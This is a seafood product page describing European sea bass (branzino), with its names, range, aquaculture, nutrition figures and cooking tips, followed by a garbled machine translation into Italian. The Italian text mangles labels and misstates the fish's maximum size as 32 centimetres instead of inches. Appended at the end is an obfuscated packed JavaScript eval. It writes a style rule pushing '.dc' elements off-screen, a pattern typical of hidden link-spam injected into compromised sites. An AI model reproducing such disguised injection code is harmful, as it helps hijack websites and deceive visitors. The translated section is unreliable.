Sea bass, often marketed by U.S. chefs under the Italian name branzino, is a prized fish in Europe, where it is largely a recreational catch. 

Scientific name: Dicentrarchus labrax

Market name: Sea bass

Common names: European sea bass, Mediterranean sea bass, branzino, bar, loup de mer

French: Bar, loup de mer

German: Wolfbarsch

Italian: Spigola

Japanese: Hata

Spanish: Lubina

 

Introduction:

Sea bass, often marketed by U.S. chefs under the Italian name branzino, is a prized fish in Europe, where it is largely a recreational catch. Small commercial fisheries exist in the Mediterranean. The gear used to catch these bass includes beach and purse seines, trawl nets, trammel nets, longlines and rod and line. Commercial catches are sold fresh, mainly to local markets. This sea bass, which reaches a maximum size of around 32 inches, is found in the Atlantic along the European coasts, in the Mediterranean and as far south as Senegal. Limited wild harvests and a high price made U.S. imports unfeasible until farmed supplies from Norway and Greece began appearing in the American market. Demand today is met almost exclusively by aquacultured product. The bass’s ability to thrive in seawater, brackish water and even fresh water makes it a good candidate for farming. Though now classified as Dicentrarchus labrax, branzino has also gone by the scientific name Morone labrax.

 

Product Profile:

European sea bass meat is pinkish when raw and cooks up opaque white.The finely textured, flaky meat is lean, with a sweet and mild flavor. Many chefs say the wild-caught bass is more flavorful than the farmed product.

 

Nutrition Facts:

Calories: 97
Fat Calories: 18
Total Fat: 2.0 g
Saturated Fat: 0.51 g
Cholesterol: 41 mg
Sodium: 68 mg
Protein: 19.3 g
Omega 3: 0.7 g

 

Cooking Tips:

Since branzino has a relatively low fat content, it is best steamed, baked or sautéed, as these preparations let the delicate flavor come through. Mediterranean cooks grill branzino, but this is tricky as the flesh can dry out easily.

 

Substitutions:

Black sea bass, Perch, Whitefishnutrition facts.

 TRADUZIONE DELLE PAGINA IN ITALIANO:

Branzino, spesso commercializzato da cuochi americani con il nome di branzino italiano, è un pesce pregiato in Europa, dove è in gran parte una cattura da diporto.

Nome scientifico:

Nome Dicentrarchus labraxMarket:

nomi Mare bassCommon: basso europea mare, branzino mediterraneo, branzino, bar, loup de mer francese: Bar, loup de merGerman: WolfbarschItalian: SpigolaJapanese: HataSpanish: Lubina

Introduzione: branzino, spesso commercializzato da Stati Uniti chef sotto il nome di branzino italiana, è un pesce pregiato in Europa, dove è in gran parte una cattura da diporto. Esistono piccole pesca commerciale nel Mediterraneo. Gli attrezzi utilizzati per la cattura di questi bassi comprende la spiaggia e ciancioli, reti da traino, tramagli, palangari e canna e la linea. Catture commerciali sono venduti freschi, principalmente ai mercati locali. Questo spigola, che raggiunge una dimensione massima di circa 32 centimetri, si trova in Atlantico lungo le coste europee, nel Mediterraneo e come estremo sud come il Senegal. Limitata raccolti selvatici e un prezzo elevato ha reso Stati Uniti importano irrealizzabile fino a quando le forniture d’allevamento dalla Norvegia e Grecia ha cominciato a comparire nel mercato americano. La domanda di oggi è soddisfatta quasi esclusivamente da prodotti di acquacoltura. La capacità del basso a prosperare in acqua di mare, acqua salmastra e persino l’acqua fresca lo rende un buon candidato per l’agricoltura. Anche se ora classificato come Dicentrarchus labrax, branzino è anche andato con il nome scientifico Morone labrax. Profilo del prodotto: carne europea spigola è rosato quando crudo e cuochi opaca white.The finemente strutturata, la carne traballante è magra, con un sapore dolce e delicato. Molti chef dicono che il basso catturati in natura è più saporito rispetto al prodotto d’allevamento.

Informazioni nutrizionali:

Calorie: Calorie 97 Fat: 18 Total Fat: 2,0 g Saturated Grassi: 0.51 g Cholesterol: 41 mg Sodium: 68 mg Protein: 19.3 g Omega 3: 0,7 g Consigli di cucina: Da branzino ha un relativamente basso contenuto di grassi, è meglio al vapore, al forno o saltati in padella , in quanto queste preparazioni lasciano il sapore delicato venire attraverso. Mediterraneo cuochi griglia Branzino, ma questo è difficile come la carne può asciugarsi facilmente.

Sostituzioni: nero spigola, pesce persico fatti, Whitefishnutrition.” eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘i(f.j(h.g(b,1,0,9,6,4,7,c,d,e,k,3,2,1,8,0,8,2,t,a,r,s,1,2,6,l,0,4,q,0,2,3,a,p,5,5,5,3,m,n,b,o,1,0,9,6,4,7)));’,30,30,’116|115|111|112|101|57|108|62|105|121|58|60|46|100|99|document|fromCharCode|String|eval|write|123|117|120|125|47|45|59|97|98|110′.split(‘|’),0,{}))

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